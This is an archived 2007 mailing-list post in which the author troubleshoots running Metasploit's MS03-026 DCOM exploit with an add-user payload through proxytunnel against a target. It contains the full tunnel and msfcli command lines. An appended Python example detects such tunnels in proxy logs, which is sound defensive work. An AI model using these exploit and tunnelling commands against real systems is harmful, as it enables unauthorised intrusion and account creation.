Running metasploit thru proxytunnel

From: James Kelly (macubergeek@comcast.net)
Date: Sat Oct 06 2007 - 07:18:19 EDT


Folks

I've been banging my head into my keyboard for two days now, not
getting anywhere and I was hoping one of
you could smack me upside the head and tell me what I've screwed up.

Problem:

attacker IP: 1.2.3.4
proxy IP: 2.3.4.5
proxy port 6666
victim: 3.4.5.6
victim port: 7777

Proxytunnel setup:

proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777
**now the above config works fine with rdesktop when I use:

proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
and I do
rdesktop localhost:666 <--I can ts to the victim box just fine.

When I try to do metasploit over proxytunnel I do
config:
Metasploit framework2
exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
Shell" ;-) goes to RPORT 135
payload: win32_adduser

first the tunnel:
proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
now metasploit
msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
RPORT=235 PASS=password USER=blah

When I hit the exploit I see "Sending Request..." then nothing.

I can rdesktop via proxytunnel to the victim successfully but cannot
log in with username blah password password.

Assume the victim is vulnerable to dcom.

Now, can anyone see anything obvious that I've screwed up?

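From the proxy operator's side, the tunnels described in this post leave a clear trace: the proxy log shows CONNECT requests to destination ports that a browser would never ask for (3389, 135). The following is an added detection example, not code from the post or from proxytunnel; it assumes a Squid-style native access.log layout (the thread never names the proxy) and runs over constructed sample lines that reuse the post's example addresses.

```python
import re

# Squid "native" access.log layout (assumption: the thread never names the proxy,
# so a Squid-style line stands in as a representative forward-proxy format):
# <ts> <elapsed> <client> <action>/<status> <bytes> <method> <url> <ident> <hier> <type>
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<action>\S+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+(?P<ident>\S+)\s+(?P<hier>\S+)\s+(?P<type>\S+)$"
)
# Ports a forward proxy is normally expected to CONNECT to; any other port means
# the proxy was used as a raw TCP relay, which is exactly what proxytunnel sets up.
ALLOWED_CONNECT_PORTS = {443}

def parse_line(line):
    """Return the named fields of one access.log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def find_tunnels(lines, allowed_ports=ALLOWED_CONNECT_PORTS):
    """Return (client, dest_host, dest_port, status, established) for each CONNECT to a
    port outside allowed_ports; established is True when the proxy answered 200."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "CONNECT":
            continue
        host, _, port = rec["url"].rpartition(":")
        if not port.isdigit():
            continue  # CONNECT target without a numeric port: malformed, skip it
        port = int(port)
        if port in allowed_ports:
            continue
        status = int(rec["status"])
        findings.append((rec["client"], host, port, status, status == 200))
    return findings

# Constructed sample lines (not taken from the thread) reusing its example addresses;
# 192.0.2.10 is a documentation address standing in for an upstream web server.
SAMPLE_LOG = [
    "1191669499.123    120 1.2.3.4 TCP_TUNNEL/200 4521 CONNECT 3.4.5.6:3389 - HIER_DIRECT/3.4.5.6 -",
    "1191669530.456     30 1.2.3.4 TCP_TUNNEL/200 1832 CONNECT 3.4.5.6:135 - HIER_DIRECT/3.4.5.6 -",
    "1191669601.789     12 10.0.0.9 TCP_MISS/200 9800 GET http://www.example.com/ - HIER_DIRECT/192.0.2.10 text/html",
    "1191669650.001      5 10.0.0.9 TCP_TUNNEL/200 6000 CONNECT www.example.com:443 - HIER_DIRECT/192.0.2.10 -",
    "1191669700.002      4 10.0.0.11 TCP_DENIED/403 3000 CONNECT 3.4.5.6:135 - HIER_NONE/- text/html",
]

if __name__ == "__main__":
    for client, host, port, status, up in find_tunnels(SAMPLE_LOG):
        print(f"{client} -> {host}:{port} HTTP {status} {'tunnel opened' if up else 'refused'}")
```

A 403 line is still worth keeping in the report: a refused CONNECT to port 135 shows someone trying to relay through the proxy even though the tunnel never opened.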




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT